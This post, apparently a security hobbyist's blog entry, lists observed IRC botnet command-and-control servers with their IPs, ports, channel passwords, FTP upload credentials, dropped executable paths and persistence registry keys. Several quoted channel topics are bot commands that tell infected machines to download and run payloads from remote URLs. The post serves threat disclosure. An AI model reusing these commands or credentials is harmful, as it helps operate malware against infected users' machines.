Author: Pig

Botnet C&C irc xxl.myftp.org DNS_TYPE_A 84.19.172.60 xxl.myftp.org :6667 Nick: [AUS|00|P|43801] Username: XP-5982 Server Pass: test Joined Channel: ##ii## with Password ##ii## Private Message to Channel ##ii##: “[IM]: Thread Activated: Sending Message.” Process Created C:WINDOWSnotepad2.exe Topic is ‘.msn.msg free version of itunes download here: http://www.thaibookcafe.com/logs/un.exe?=’ Set by KoRn on Thu Sep 09 02:21:25

Botnet C&C irc swo3.botsgod.info DNS_TYPE_A 67.159.2.117 swo3.botsgod.info:4949 Nick: {NOVY}[AUS][XP-SP3]065873 Username: VirUs Joined Channel: #sWo3# with Password VrX Channel Topic for Channel #sWo3#: “!clean | !join #x” Private Message to Channel #sWo3#: “Specified process killed.” Process Created C:DOCUME~1ADMINI~1LOCALS~1TempMSFW.exe

Botnet C&C irc justtestingit.psybnc.cz ip: 92.243.21.112 justtestingit.psybnc.cz:9595 Channel:#-SC-# pass:jessica ftpd to get bot ftpdftpds.psybnc.cz:8989 user:upload pass:upload Process Created C:windows/dn.exe

Botnet C&C irc swo4.botsgod.info DNS_TYPE_A 95.142.163.184 swo4.botsgod.info :12345 Nick: {NOVY}[AUS][XP-SP3]237681 Username: VirUs Joined Channel: #sWo4# with Password VrX Channel Topic for Channel #sWo4#: “!NAZELswo4 http://www.sitepalace.com/facebookofsex/blazep1.jpeg MSUPDATE.exe 1” Private Message to Channel #sWo4#: “Executed process “MSUPDATE.exe”.” Process Created C:DOCUME~1ADMINI~1LOCALS~1Tempswo4.exe

Botnet C&C irc java.KUTLUFAMILY.COm ip: 88.255.104.171 java.KUTLUFAMILY.COm ip: 88.255.104.172 java.KUTLUFAMILY.COm:81 User Name: SP3-920 Real Name: HOME-OFF-D5F0AC Nick Name: [N00_USA_XP_7173355] Channel: #oo #xs #kk Process Created HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun Microsoft Driver Setup C:WINDOWSsystem32Zsorm.exe

Botnet C&C irc magic.metraiciono.com DNS_TYPE_A 74.82.57.173 magic.metraiciono.com:6567 Nick: [SI|AUS|00|P|00638] Username: XP-6610 Server Pass: s1m0n3t4 Joined Channel: #inlove# with Password c1rc0dus0leil Process Created C:WINDOWSwinsont.exe

 That lamer have nick name Parabola lol DNS Lookup Host Name     IP Address 0     127.0.0.1 browseusers.myspace.com    browseusers.myspace.com     216.178.38.168 x.myspacecdn.com    x.myspacecdn.com     212.201.100.176 myspace.ivwbox.de    myspace.ivwbox.de     193.46.63.103 www.google-analytics.com    www.google-analytics.com     74.125.39.113 js.myspacecdn.com    js.myspacecdn.com     212.201.100.169 cms.myspacecdn.com    cms.myspacecdn.com     212.201.100.169 qs.ivwbox.de    qs.ivwbox.de     193.46.63.90 pagead2.googlesyndication.com    pagead2.googlesyndication.comRead more...

letforme.barmy-army.net ip: 147.102.159.9 letforme.barmy-army.net ip: 203.141.249.71 letforme.barmy-army.net ip: 93.62.62.208 letforme.barmy-army.net ip: 188.65.49.11 letforme.barmy-army.net ip: 137.229.242.12 letforme.barmy-army.net ip: 67.159.2.111 letforme.barmy-army.net ip: 213.11.137.67 letforme.barmy-army.net ip: 139.91.102.101 letforme.barmy-army.net ip: 195.22.37.163 letforme.barmy-army.net :9595 Channel:#-MS-# password:jessica ftpd server to get bot ftpd.barmy-army.net:8989 User:upload  pass:upload Process Created C:windows/dn.exe here picture from botnets and people who use these bots

vs.barmy-army.net ip: 208.125.38.183 vs.barmy-army.net ip: 188.65.49.11 vs.barmy-army.net ip: 66.252.1.38 vs.barmy-army.net ip: 147.102.159.9 vs.barmy-army.net ip: 137.229.242.129 vs.barmy-army.net ip: 67.159.2.111 vs.barmy-army.net ip: 195.22.37.163 vs.barmy-army.net ip: 93.62.62.208 vs.barmy-army.net:9595 Channel:#Us-D33# Channel:#SafE# password:jessica C:DOCUME~1d33LOCALS~1TempVAD33.exe

Value and Dee botnet C&C irc jogon.barmy-army.net:9595 jogon.barmy-army.net ip: 147.102.159.9 jogon.barmy-army.net ip: 208.125.38.183 jogon.barmy-army.net ip: 203.141.249.71 jogon.barmy-army.net ip: 213.11.137.67 jogon.barmy-army.net ip: 137.229.242.129 jogon.barmy-army.net ip: 195.22.37.163 jogon.barmy-army.net ip: 66.252.1.38 jogon.barmy-army.net ip: 139.91.102.101 jogon.barmy-army.net ip: 188.65.49.11 jogon.barmy-army.net ip: 93.62.62.208 jogon.barmy-army.net ip: 67.159.2.111 Joined Channel: #-IMBOT-# with Password j3ss1c4 Channel Topic for Channel #-IMBOT-#: “.dl.start http://www.sitepalace.com/Yahoo/va.jpeg C:vas.exe 1Read more...